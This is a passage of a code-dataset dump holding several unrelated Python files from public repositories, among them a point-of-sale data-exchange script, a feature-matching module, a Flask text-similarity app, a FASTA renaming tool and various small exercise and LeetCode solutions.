self.sw.show()\n","repo_name":"flyflyinit/GUI-admin-tool","sub_path":"project/backup/mainbackup.py","file_name":"mainbackup.py","file_ext":"py","file_size_in_byte":16894,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"29382232739","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport httplib2\nimport urllib\nimport base64\nimport json\nimport time\nfrom pydomino import Alias,local_store\nfrom xml.dom.minidom import parse\nfrom sys import argv,exit,version_info\nfrom os import system,getpid,path\nfrom socket import gethostname\nfrom datetime import datetime,timedelta\nfrom fcntl import flock,LOCK_EX,LOCK_NB,LOCK_UN,LOCK_SH\n\nlock_file=\"/tmp/load_handbook.lock\"\nsend_error_programm = \"/usr/local/domino/bin/send-error-message\"\nARTIX_UNPACK_PRICE_INDEX=50\nDOMINO_PROTOCOL_PRODUCT_PREFIX=\"ТОВАР.\"\nDOMINO_RETAIL_PRICE_INDEX=4\nDOMINO_BASE_CODE_LEN=5\nDOMINO_CASHIER_REGION=\"CAS\"\nDOMINO_KEYBOARD_TYPE=\"GR\"\nARTIX_PRODUCT_CODE_PREFIX=\"DC\"\nARTIX_CASHIER_PASSWORD_MASK=\";%s=1?\"\nARTIX_ROLES={\"1\":\"5\",\"2\":\"6\",\"4\":\"2\",\"8\":\"4\"}\ndomino_units = {\"АМПЛ\":1,\n\"БЛСТ\":2,\n\"ДРЖ.\":3,\n\"КАПС\":4,\n\"КАРП\":5,\n\"ПАК.\":6,\n\"ПАРА\":7,\n\"ПОР.\":8,\n\"СВЕЧ\":9,\n\"ТАБ.\":10,\n\"ТУБА\":11,\n\"ТЮБ.\":12,\n\"УПАК\":13,\n\"ФЛ.\":14,\n\"ШТ\":15}\n\n\nclass ArtixExchange:\n\tdef __init__(self,shopcode,hostname,port=28080,user=\"admin\",password=\"admin\"):\n\t\tself.host=hostname\n\t\tself.shopcode=shopcode\n\t\tself.user=user\n\t\tself.port=port\n\t\tself.password=password\n\tdef send(self,commands):\n\t\tif version_info < (3,):\n\t\t\tlogin = b\"%s:%s\"%(self.user,self.password)\n\t\telse:\n\t\t\tlogin = bytes(\"%s:%s\"%(self.user,self.password), 'utf-8')\n\t\thttp = httplib2.Http(\".cache\")\n\t\tbase64string = base64.encodestring(login)\n\t\tstr_=base64string.decode(\"utf-8\")\n\t\tauthheader = \"Basic %s\" % str_\n\t\tjsonHeader = {'Content-Type':'application/json', \"Accept\": 
\"application/json\", \"Authorization\": authheader}\n\t\tmethod = 'POST'\n\t\tdictionaryId = str(time.time())\n\t\turl = 'http://%s:%s/aifexchange/loaddicts?shopcode=%s&dictionaryid=%s' % (self.host, self.port, self.shopcode, dictionaryId)\n\t\tbody = json.dumps(commands)\n\t\tanswer = None\n\t\ttry:\n\t\t\tresponse, content = http.request(url, method, headers=jsonHeader, body=body)\n\t\t\tif response.status == 200:\n\t\t\t\tanswer = json.loads(content.decode(\"cp1251\"))\n\t\t\telse: print(\"status\",response.status)\n\t\texcept: pass\n\t\treturn answer and answer['success']\n\ndef send_error(msg):\n\tprint(\"Error: %s\"%(msg))\n\tsystem(\"%s \\\"%s %s: %s\\\"\"%(send_error_programm,gethostname(),argv[0],msg))\n\texit(1)\n\ndef add_units():\n\tcommands=[]\n\tfor i in domino_units:\n\t\tcommands.append({\n\t\t\"command\":\"addUnit\",\n \"unit\":{\n \"unitCode\":domino_units[i],\n \"name\":i,\n \"fractional\":False\n }})\n\treturn commands\ndef get_barcode(product,barcode):\n\tbar={\"barcode\": barcode.barcode,\"cquant\": product.coef}\n\tif product.coef > 1:\n\t\tbar[\"measureCode\"]=domino_units[product.tech_unit]\n\t\tbar[\"packingmeasure\"]=domino_units[product.unit]\n\t\tbar[\"packingprice\"]=product.price(DOMINO_RETAIL_PRICE_INDEX)\n\t\tbar[\"price\"]=product.price(DOMINO_RETAIL_PRICE_INDEX)*product.coef\n\t\tbar[\"cquant\"]=product.coef\n\treturn bar\ndef get_product(product,barcode,barcodekey,store_pref):\n\tif not product.price(DOMINO_RETAIL_PRICE_INDEX): return None\n\tif product.is_parcel and product.code[6:8] != store_pref: return None\n\tbarcodekey.set_code(product.code)\n\tif not barcode.get_equal(barcodekey): return None\n\tdata = {\"inventcode\":(not product.is_parcel and ARTIX_PRODUCT_CODE_PREFIX or \"\") + product.code,\n\t\t\t\"measureCode\":domino_units[product.unit],\n\t\t\t\"isInventItem\":True,\n\t\t\t\"price\":product.price(DOMINO_RETAIL_PRICE_INDEX),\n\t\t\t\"barcodes\":[get_barcode(product,barcode)],\n\t\t\t\"cquant\": 1,\n\t\t\t\"name\": 
product.name}\n\tk=barcodekey.clone()\n\twhile barcode.get_next(barcodekey):\n\t\tif k.cmp(barcodekey,1): break\n\t\tdata[\"barcodes\"].append(get_barcode(product,barcode))\n\treturn data\ndef add_product(product,barcode,barcodekey,mstore):\n\tstore_pref=\"%2.2d\"%(int(mstore))\n\tdata = get_product(product,barcode,barcodekey,store_pref)\n\tif not data: return None\n\treturn {\"command\":\"addInventItem\", \n\t\t\t \"invent\":data}\ndef add_invent(alias,mstore,code):\n\tproductkey,product=alias.ProductKey4(),alias.Product()\n\tbarcodekey,barcode=alias.BarcodeKey1(),alias.Barcode()\n\tproductkey.set_code(code)\n\tcommands = []\n\tif not product.get_equal(productkey): \n\t\treturn commands\n\tcommand = add_product(product,barcode,barcodekey,mstore)\n\tif command: commands.append(command)\n\tif not product.is_parcel:\n\t\twhile product.get_next(productkey):\n\t\t\tif product.code[:DOMINO_BASE_CODE_LEN] != code: break\n\t\t\tcommand = add_product(product,barcode,barcodekey,mstore)\n\t\t\tif command: commands.append(command)\n\treturn commands\ndef add_invents(alias,mstore):\n\tproductkey,product=alias.ProductKey4(),alias.Product()\n\tbarcodekey,barcode=alias.BarcodeKey1(),alias.Barcode()\n\tres = []\n\tproductkey.set([\"\"])\n\tb = product.get_ge(productkey)\n\ti = 0\n\twhile b:\n\t\tcom = add_product(product,barcode,barcodekey,mstore)\n\t\tif com:\n\t\t\tres.append(com)\n\t\ti+=1\n\t\tif not i % 100: print(i)\n\t\t#if i > 100: break\n\t\tb = product.get_next(productkey)\n\treturn res\ndef add_users(alias,mstore):\n\tres=[]\n\tpartner,k=alias.Partner(),alias.PartnerKey0()\n\tk.set([DOMINO_CASHIER_REGION,0])\n\tk1=k.clone()\n\tb=partner.get_ge(k)\n\twhile b:\n\t\tif k1.cmp(k,1): break\n\t\tstore=partner.store\n\t\tif store == mstore:\n\t\t\tdata=add_user(partner=partner)\n\t\t\tif data:\n\t\t\t\tres += data\n\t\tb=partner.get_next(k)\n\treturn res\ndef add_user(alias=None,partner=None,code=None):\n\tif not 
partner:\n\t\tpartner,k=alias.Partner(),alias.PartnerKey0()\n\t\tk.set([DOMINO_CASHIER_REGION,code])\n\t\tif not partner.get_equal(k):\n\t\t\treturn None\n\trole = partner.param(\"ПРО_ROLE\")\n\tif role not in ARTIX_ROLES: return None\n\treturn [{\n \"command\":\"addMCashUser\", \n \"mcashuser\":\n {\"code\":str(partner.code),\n \"name\":partner.name,\n \"login\":str(partner.code),\n \"password\":ARTIX_CASHIER_PASSWORD_MASK%(partner.param(\"ПРО_LOGIN\")),\n \"roleusers\":\n [{\"rolecode\":ARTIX_ROLES[role],\n \"rule\":\"1\"}]}}]\ndef getText(nodelist):\n\trc = []\n\tfor node in nodelist:\n\t\tif node.nodeType == node.TEXT_NODE:\n\t\t\trc.append(node.data)\n\treturn ''.join(rc)\ndef getValue(elemlist):\n\ttry:\n\t\treturn getText(elemlist[0].childNodes)\n\texcept:\n\t\treturn None\ndef nodeElementText(elem,name):\n\treturn getValue(elem.getElementsByTagName(name))\nclass KeyboardValue:\n\tkeycode=0\n\tcmactioncode=0\n\tkeyvalue=\"\"\n\tcontext=\"allcontext\"\n\tdef __init__(self,elem):\n\t\tself.keycode = int(nodeElementText(elem.getElementsByTagName(\"pk\")[0],\"keycode\"))\n\t\tself.cmactioncode=int(nodeElementText(elem,\"cmactioncode\"))\n\t\tself.keyvalue=nodeElementText(elem,\"keyvalue\")\n\t\tself.context=nodeElementText(elem,\"context\")\n\tdef __str__(self):\n\t\treturn \"\"\"\n\"kbkey\":{\n \"keycode\":%d,\n \"cmactioncode\":%d,\n \"keyvalue\":\"%s\",\n \"context\":\"%s\"\n }\"\"\"%(self.keycode,self.cmactioncode,self.keyvalue,self.context)\ndef load_func_keys_from_file(filename):\n\tdom = parse(filename)\n\tres = []\n\tfor elem in dom.getElementsByTagName(\"domainCollection\"):\n\t\tif elem.getAttribute(\"xsi:type\") == \"kbkey\":\n\t\t\tk = KeyboardValue(elem)\n\t\t\tres.append(k)\n\treturn res\ndef add_func_keys(filename):\n\tres = []\n\tfor l in load_func_keys_from_file(filename):\n\t\tres.append({\n \"command\":\"addKbKey\",\n \"kbkey\":{\n \"keycode\":l.keycode,\n \"cmactioncode\":l.cmactioncode,\n \"keyvalue\":l.keyvalue,\n 
\"context\":l.context}})\n\treturn res\ndef add_invent_keys(alias,mstore):\n\tdocument,dkey=alias.Document(),alias.DocumentKey0()\n\torder,okey=alias.DocumentOrder(),alias.DocumentOrderKey0()\n\tdkey.set([DOMINO_KEYBOARD_TYPE,mstore,\"\"])\n\tk1=dkey.clone()\n\tkp,pp=alias.ProductKey4(),alias.Product()\n\tres = []\n\tb=document.get_ge(dkey)\n\twhile b:\n\t\tif k1.cmp(dkey,2): break\n\t\tif document.param(\"404\") in [\"1\",\"2\"]:\n\t\t\tcodes = []\n\t\t\tif document.param(\"ТОВАР\"): \n\t\t\t\tcode1=document.param(\"ТОВАР\")\n\t\t\t\tkp.set([code1])\n\t\t\t\tif pp.get_equal(kp) and pp.price(4):\n\t\t\t\t\tcodes.append(ARTIX_PRODUCT_CODE_PREFIX+code1)\n\t\t\t\telse:\n\t\t\t\t\tprint(code1)\n\t\t\tokey.set(document)\n\t\t\tokey.set_line(0)\n\t\t\tk=okey.clone()\n\t\t\tb = order.get_ge(okey)\n\t\t\twhile b:\n\t\t\t\tif k.cmp(okey,3): break\n\t\t\t\tkp.set([order.code])\n\t\t\t\tif pp.get_equal(kp) and pp.price(4):\n\t\t\t\t\tcodes.append(ARTIX_PRODUCT_CODE_PREFIX+order.code)\n\t\t\t\telse:\n\t\t\t\t\tprint(order.code)\n\t\t\t\tb = order.get_next(okey)\n\t\t\tres.append({\"hotkey\": {\n\t\t\t\t\t\t\"hotkeycode\": int(document.document),\n\t\t\t\t\t\t\"hotkeyname\": document.param(\"420\"),\n\t\t\t\t\t\t\"inventcodes\":codes\n\t\t\t\t\t },\n\t\t\t\t\t\t\"command\": \"addHotKey\"})\n\t\tb=document.get_next(dkey)\n\treturn res\ndef get_list_update(alias,name):\n\tlast = datetime.now()\n\tk,p=alias.ProtocolKey2(),alias.Protocol()\n\tk.set([name,last,last])\n\tb=p.get_le(k)\n\tif not b or p.user_name != name or datetime.combine(p.date,p.time) < last+timedelta(days=-2) : return None,None\n\tret=[]\n\tk=alias.ProtocolKey1()\n\tlast = datetime.combine(p.date,p.time)+timedelta(seconds=-50)\n\tk.set([last,last])\n\tb=p.get_ge(k)\n\twhile b:\n\t\tif p.object_name[:len(DOMINO_PROTOCOL_PRODUCT_PREFIX)] == DOMINO_PROTOCOL_PRODUCT_PREFIX:\n\t\t\tcode = p.object_name[len(DOMINO_PROTOCOL_PRODUCT_PREFIX):len(DOMINO_PROTOCOL_PRODUCT_PREFIX)+5]\n\t\t\tif code not in 
ret:\n\t\t\t\tret.append(code)\n\t\tlast = datetime.combine(p.date,p.time)\n\t\tb=p.get_next(k)\n\treturn ret,last\ndef set_last(alias,name,last):\n\tp=alias.Protocol()\n\tp.set_object_name(\"EXCHANGE\")\n\tp.set_user_name(name)\n\tp.set_date(last)\n\tp.set_time(last)\n\tp.insert()\ndef add_updates(alias,mstore,username):\n\tcodes,last = get_list_update(alias,username)\n\tnow=datetime.now()\n\tret = []\n\tif not last:\n\t\tret += [{\"command\": \"clearInventory\"}]\n\t\tret += add_units()\n\t\tret += add_invents(a,store)\n\telif codes:\n\t\tprint(\"%s: Данные с %s необходимо обновить %d тов.\"%(datetime.now().strftime(\"%d/%m/%y %H:%M:%S\"),last.strftime(\"%d/%m/%y %H:%M:%S\"),len(codes)))\n\t\tfor code in codes:\n\t\t\tr = add_invent(alias,mstore,code)\n\t\t\tif r:\n\t\t\t\tret += r\n\treturn ret,now\ndef lock(filename):\n\ttry:\n\t\tif path.isfile(filename):\n\t\t\tflock(open(filename,\"r\"),LOCK_EX | LOCK_NB)\n\texcept:\n\t\ttry:\n\t\t\td=int(open(filename,\"r\").read()) or -999\n\t\texcept: d=-999\n\t\treturn d\n\topen(filename,\"w\").write(\"%d\"%(getpid()))\n\tglobal h\n\th=open(filename,\"r\")\n\tflock(h,LOCK_EX)\n\treturn 0\nif __name__ == \"__main__\":\n\tpid=lock(lock_file)\n\tif pid: \n\t\tprint(\"lock by proccess %d\"%(pid))\n\t\texit(1)\n\ta=Alias()\n\tstore=local_store()\n\tartix=ArtixExchange(store,\"kassa-99\")\n\tusername=gethostname()\n\tlast=None\n\tcommands = []\n\t#last = get_protocols(a,)\n\tlen_=len(argv)\n\tif len_ not in [2,3] or (len_ == 2 and argv[1] not in [\"products\",\"cashiers\",\"updates\"]) or (len_ == 3 and argv[1] not in [\"product\"]):\n\t\tsend_error(\"Неправильный параметр %s\"(argv))\n\tif len_ == 1 or (len_ == 2 and argv[1] == \"updates\"):\n\t\tret,last = add_updates(a,store,username)\n\t\tcommands += ret\n\telif argv[1] == \"products\":\n\t\tlast = datetime.now()\n\t\tcommands += [{\"command\": \"clearInventory\"}]\n\t\tcommands += add_units()\n\t\tcommands += add_invents(a,store)\n\telif argv[1] == 
\"cashiers\":\n\t\tcommands += [{\"command\": \"clearMCashUser\"}]\n\t\tcommands += add_users(a,store)\n\telif argv[1] == \"product\":\n\t\tcommands += add_invent(a,store,argv[2])\n\tif commands:\n\t\tif not artix.send(commands):\n\t\t\tsend_error(\"Ошибка обновления справочников\")\n\t\telse:\n\t\t\tif last:\n\t\t\t set_last(a,username,last)\n\t\t\tprint(\"ok\")\n\t#else:\n\t#\tprint(\"empty ok\")\n","repo_name":"mirror-partorg/domino","sub_path":"domino/src/artix.rest/load-handbook.py","file_name":"load-handbook.py","file_ext":"py","file_size_in_byte":11153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"69899076199","text":"import dataclasses\nimport heapq\nfrom enum import Enum\nfrom typing import Callable, Dict, List, NewType, Set\n\nimport numpy as np\nimport tqdm\n\nfrom lib.common.feature import Feature\n\n# Interface definition of a matching function.\nScoreFunction = NewType(\"ScoreFunction\", Callable[[Feature, Feature], float])\n\n\n@dataclasses.dataclass\nclass Match:\n a_index: int = -1\n b_index: int = -1\n # A lower score indicates a better match in all cases.\n match_score: float = np.Infinity\n\n def __lt__(self, other) -> bool:\n \"\"\"Comparison operator based on match score.\"\"\"\n return self.match_score < other.match_score\n\n\nclass ValidationStrategy(Enum):\n \"\"\"Validation strategy when matching features.\"\"\"\n\n CROSSCHECK = 1 # Features (i, j) are only a match, if the Score(i,j) is the lowest out of all scores for both i and j\n RATIO_TEST = (\n 2 # The ratio of the two best scores need to be larger than a threshold\n )\n\n\ndef match_brute_force(\n features_a: List[Feature],\n features_b: List[Feature],\n score_function: ScoreFunction,\n *,\n validation_strategies: ValidationStrategy | Set[ValidationStrategy] | None = None,\n ratio_test_threshold: float = 0.5\n) -> List[Match]:\n \"\"\"\n Matches two list features using a brute-force pairwise method.\n\n :param 
features_a: First list of features.\n :param features_b: Second list of features.\n :param score_function: A score function which returns the score of a particular match.\n :param validation_strategies: The validation strategies to use.\n :param ratio_test_threshold: The maximum ratio between the scores of the best and second best match if\n validation_strategy == RATIO_TEST. Matches not meeting this criterion will be set to Match().\n :return: List of matches for every feature in features_a, in the order of features_a.\n \"\"\"\n matches_for_a_features: List[List[Match]] = [[] for _ in range(len(features_a))]\n\n for a_index, feature_a in tqdm.tqdm(\n enumerate(features_a), \"Brute force feature matching\", total=len(features_a)\n ):\n for b_index, feature_b in enumerate(features_b):\n score = score_function(feature_a, feature_b)\n heapq.heappush(\n matches_for_a_features[a_index],\n Match(a_index=a_index, b_index=b_index, match_score=score),\n )\n\n if validation_strategies is None:\n validation_strategies = set()\n elif not isinstance(validation_strategies, set):\n validation_strategies = set([validation_strategies])\n\n if ValidationStrategy.RATIO_TEST in validation_strategies:\n matches_for_a_features = _filter_by_ratio_test(\n matches_for_a_features, ratio_test_threshold\n )\n if ValidationStrategy.CROSSCHECK in validation_strategies:\n matches_for_a_features = _filter_by_crosscheck(matches_for_a_features)\n\n matches = [matches_for_feature[0] for matches_for_feature in matches_for_a_features]\n\n return matches\n\n\ndef _filter_by_ratio_test(\n all_matches_for_all_features: List[List[Match]], ratio_test_threshold: float\n) -> List[List[Match]]:\n matches = []\n for all_matches_for_feature in all_matches_for_all_features:\n if len(all_matches_for_feature) > 1:\n if (\n all_matches_for_feature[0].match_score\n / all_matches_for_feature[1].match_score\n ) <= ratio_test_threshold:\n matches.append([all_matches_for_feature[0]])\n elif len(all_matches_for_feature) 
== 1:\n matches.append([all_matches_for_feature[0]])\n return matches\n\n\ndef _filter_by_crosscheck(\n all_matches_for_a_features: List[List[Match]],\n) -> List[List[Match]]:\n best_matches_for_b_features: Dict[int, Match] = {}\n for matches_for_a in all_matches_for_a_features:\n best_match_for_a = matches_for_a[0]\n if (\n best_match_for_a.b_index not in best_matches_for_b_features\n or best_matches_for_b_features[best_match_for_a.b_index].match_score\n > best_match_for_a.match_score\n ):\n best_matches_for_b_features[best_match_for_a.b_index] = best_match_for_a\n\n filtered_matches = [\n [matches_for_a[0]]\n for matches_for_a in all_matches_for_a_features\n if matches_for_a[0] == best_matches_for_b_features[matches_for_a[0].b_index]\n ]\n return filtered_matches\n","repo_name":"Bazs/structure_from_motion","sub_path":"lib/feature_matching/matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"32420074023","text":"# two float values\nval1 = 100.99\nval2 = 76.15\n# Adding the two given numbers\nsum = float(val1) + float(val2)\n\n# Displaying the addition result\nprint(\"The sum of given numbers is: \", sum)\n\n# two float values input by demand\n# Adding the two given numbers\nval1 = float(input(\"Primeiro valor: \"))\nval2 = float(input(\"Segundo valor: \"))\nsum = float(val1) + float(val2)\n\n# Displaying the addition result\nprint(\"A Soma é igual a: \", sum)\n","repo_name":"paepe/GitBegginers","sub_path":"HowToSumNumbers.py","file_name":"HowToSumNumbers.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19827939237","text":"\"\"\"\nApproach is really simple although looks complicated. Approach is that at every step, from all 4 directions,\nchoose the maximum value and put it into queue and mark as visited. 
Then dequeue it and again from all 4 directions, choose\nthe maximum value and put into queue and mark as visited. Keep repeating this until you reach the end.\nWhile selecting the maximum value neighbour for each cell, first check if that cell has already been visited or not\ni.e cell value != 'V'. If it has not been visited then only enter the if loop in line 38\n\"\"\"\n\nfrom collections import deque\nclass Solution(object):\n def maximumMinimumPath(self, A):\n \"\"\"\n :type A: List[List[int]]\n :rtype: int\n \"\"\"\n queue = deque()\n queue.append((0,0,A[0][0])) # Append 1st element at [0][0] to intialize the queue\n A[0][0] = 'V'\n global_min = float(\"inf\") # maitain a global minimum\n rows = len(A)\n cols = len(A[0])\n while queue:\n curr_i,curr_j,curr_val = queue.popleft() # Pop from queue\n if curr_i != rows-1 and curr_j != cols-1:\n neighbour_i,neighbour_j,neighbour_val = self.getMaxNeighbour(A,curr_i,curr_j,curr_val) # Get neighbour of current cell popped from queue\n global_min = min(global_min,neighbour_val) # If current cell has less value then global_min, then update global _min\n A[neighbour_i][neighbour_j] = 'V' # Mark as visited\n queue.append((neighbour_i,neighbour_j,neighbour_val)) # Append in queue\n else:\n return global_min\n\n def getMaxNeighbour(self,A,i,j,val):\n curr_max = (0,0,float(\"-inf\")) # Intialize curr max\n r = len(A)\n c = len(A[0])\n for k in [(i+1,j),(i-1,j),(i,j+1),(i,j-1)]: # check in all 4 directions\n if A[k[0]][k[1]] != 'V': # If the cell has not been visited already\n if A[k[0]][k[1]] > curr_max[2] and 0 <= k[0] <=r-1 and 0 <= k[1] <= c-1: # Check if the current cell is within boundary of grid and has not been already visited and its value is greater than curr_max\n curr_max = (k[0],k[1],A[k[0]][k[1]])\n return curr_max\n\n\ngrid = [[3,4,6,3,4],[0,2,1,1,7],[8,8,3,2,7],[3,2,4,9,8],[4,1,2,0,0],[4,6,5,4,3]]\ns = 
Solution()\nprint(s.maximumMinimumPath(grid))","repo_name":"anantvir/Leetcode-Problems","sub_path":"Array_Manipulations/Path_with_Minimum_Maximum_Value.py","file_name":"Path_with_Minimum_Maximum_Value.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"18223956893","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nRename fasta files based on a csv file with old and new names\n@ V.R.Marcelino\nCreated on Mon Mar 12 15:36:17 2018\n\"\"\"\n\nimport pandas as pd\nfrom argparse import ArgumentParser\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\n\n\nparser = ArgumentParser()\nparser.add_argument('-i', '--old_new_file', help='The path to the file containing old and new names', required=True)\nparser.add_argument('-f', '--fasta', help='The path to the fasta file', required=True)\nparser.add_argument('-o', '--output', help='The renamed file name', required=True)\n\n\nargs = parser.parse_args()\nrename_file = args.old_new_file\nfasta_fp = args.fasta\noutput_fp = args.output\n\n#rename_file = \"Rename_SRA_Runs.csv\"\n#fasta_fp = \"Mito.mapped.fasta\"\n#output_fp = \"Mito_mapped_renamed.fasta\"\n\n# store old and new names in a dict:\nrenames_df = pd.read_csv(rename_file,header=None,index_col=0)\nnames_dict = renames_df.to_dict('dict')[1]\n\n\n# new fasta file with renamed seqs:\nnew_fasta = []\nfor seq_record in SeqIO.parse(fasta_fp, \"fasta\"):\n old_id = seq_record.id\n if old_id in names_dict:\n new_id = names_dict[old_id] \n seq = str(seq_record.seq)\n new_record = SeqRecord(Seq(seq), id=new_id, description='')\n new_fasta.append(new_record)\n else:\n new_fasta.append(seq_record)\n\n\n# Save renamed seqs\ncount = SeqIO.write(new_fasta,output_fp, \"fasta\")\n\nprint (\"\")\nprint (\"Done. 
Saved %i sequences in the output file.\" % (count))\nprint (\"\")\n\n\n","repo_name":"vrmarcelino/utilities","sub_path":"rename_seqs.py","file_name":"rename_seqs.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6209069031","text":"from itertools import permutations\nfrom math import sqrt, factorial\n\nN = int(input())\n\nA = []\nfor i in range(N):\n x, y = map(int, input().split())\n A.append((x, y))\n\nans = 0\nfor X in permutations(A):\n tmp = 0\n for j in range(1, len(X)):\n x1, y1 = X[j - 1]\n x2, y2 = X[j]\n\n tmp += sqrt((x2 - x1)**2 + (y2 - y1)**2)\n ans += tmp\n\nprint(ans / factorial(N))\n","repo_name":"kotadd/competitive_programming","sub_path":"lib/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"74308988199","text":"import json\nimport pandas as pd\n\n\ndef json_df(data):\n \n # Complete the function\n #\n # You may create other functions if you wish,\n # but make sure this function accepts the JSON\n # string as input and returns a Pandas DataFrame\n \n d = {}\n \n \n k = \"\"\n v = \"\"\n for i in data:\n for j in i:\n k = i[j]\n v = j\n if k in d:\n l = d.get(k)\n l.append(v)\n d[k] = l\n else:\n d[k] = [v]\n \n \n \n df = pd.DataFrame(d)\n \n print(df)\n \n return df\n\n\n# DO NOT EDIT BELOW...\njson_df([\n {\"a1\": \"A\", \"b1\": \"B\", \"c1\": \"C\"},\n {\"a2\": \"A\", \"b2\": \"B\", \"c2\": \"C\"},\n {\"a3\": \"A\", \"b3\": \"B\", \"c3\": \"C\"},\n {\"a4\": \"A\", \"b4\": \"B\", \"c4\": \"C\"}\n])","repo_name":"dineshpazani/algorithms","sub_path":"src/com/python/pwc.py","file_name":"pwc.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34240141479","text":"# Normal If statement with List\n\nnumber 
= list(range(1, 11))\neven_number = []\nfor num in number:\n if num % 2 == 0:\n even_number.append(num)\n\nprint(even_number)\n\n\n# if statement with list comprehension\ndigit = [1,2,3,4,5,6,7,8,9,10]\neven_num = [num for num in digit if num % 2 == 0]\nprint(even_num)\n\nodd_num = [num for num in range(1,11) if num %2==1]\nprint(odd_num)\n","repo_name":"izharabbasi/Advance-python-learning","sub_path":"list_comprehen_with_if.py","file_name":"list_comprehen_with_if.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39314686692","text":"#서로소 평균 https://www.acmicpc.net/problem/21920\r\n#문제 접근\r\n#1. 서로소는 같은 소수가 1을 제외하고는 없음 > 일단 소수를 각각 구한다\r\n#2. gcd가 1이면 서로소이다.\r\n#추가 메모\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\nfrom math import gcd\r\n\r\nN = int(input())\r\na = input().split()\r\na = list(map(int,a))\r\nnum = int(input())\r\nsum = 0\r\nk = 0\r\nfor i in a:\r\n if gcd(i,num) == 1:\r\n sum += i\r\n k += 1\r\n\r\nprint(sum/k)\r\n","repo_name":"2023cote/2022cote_jeonghyun","sub_path":"11.19HW/21920.py","file_name":"21920.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27907768595","text":"import string\nfrom flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\ntest = [\n {'text': u'you POSTed something'}\n]\n\n\ndef jaccard_similarity(str1, str2):\n string1 = str1.translate(str.maketrans('', '', string.punctuation))\n string2 = str2.translate(str.maketrans('', '', string.punctuation))\n set_a = set(string1.split())\n set_b = set(string2.split())\n intersect = set_a.intersection(set_b)\n union = set_a.union(set_b)\n return float(len(intersect))/float(len(union))\n\n\n@app.route('/')\ndef index():\n return 'Hey, we have a Flask application inside a docker container!'\n\n\n@app.route('/text-sim/api/v1.0/compare', methods=['POST'])\ndef 
parse_request():\n data = request.json\n similarity = jaccard_similarity(data['text1'], data['text2'])\n return jsonify(similarity)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"bit-chemist/text-sim","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35882179274","text":"import numpy as np\nimport os\nimport tools as t\n\nthreshold = 0.5\n\ndef getRoadPixels(X, groundtruth):\n print(X.shape, groundtruth.shape)\n Y = np.where(groundtruth >= threshold)\n n = len(Y[0])\n dim_pixel = X.shape[-1]\n XX = np.zeros((n, dim_pixel))\n for i in range(n):\n XX[i] = X[Y[0][i], Y[1][i], Y[2][i]]\n return XX\n\ndef computeMeanPoint(X, groundtruth):\n road_pixels = getRoadPixels(X, groundtruth)\n return np.mean(road_pixels, axis=0)\n\ndef augmentImages(X, mean_point):\n XX = np.zeros(list(X.shape[:-1]) + [X.shape[-1] + 1])\n XX[:, :, :, :X.shape[-1]] = X\n XX[:, :, :, X.shape[-1]] = np.sqrt(np.sum(np.subtract(X, mean_point) ** 2, axis=-1))\n return XX\n","repo_name":"tdardinier/CIL","sub_path":"pixelwise/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21375224473","text":"#\n# @lc app=leetcode.cn id=221 lang=python3\n#\n# [221] 最大正方形\n#\nfrom typing import List\n\n\n# @lc code=start\nclass Solution:\n def maximalSquare(self, matrix: List[List[str]]) -> int:\n # dp(i,j)表示以i,j为右下角可能存在的最大正方形边长\n # if matrix[i,j] == 1:\n # dp(i,j) = dp(i-1,j) + 1 当dp(i-1,j) == dp(i,j-1)且matrix[i-dp(i-1,j), j-dp(i-1,j)] == 1\n # dp(i,j) = dp(i-1,j) 当dp(i-1,j) == dp(i,j-1)且matrix[i-dp(i-1,j), j-dp(i-1,j)] == 0\n # dp(i,j) = min(dp(i-1,j), dp(i,j-1)) + 1 其他情况\n height = len(matrix)\n width = len(matrix[0])\n dp = [[0] * width for _ in range(height)]\n for i in range(height):\n if 
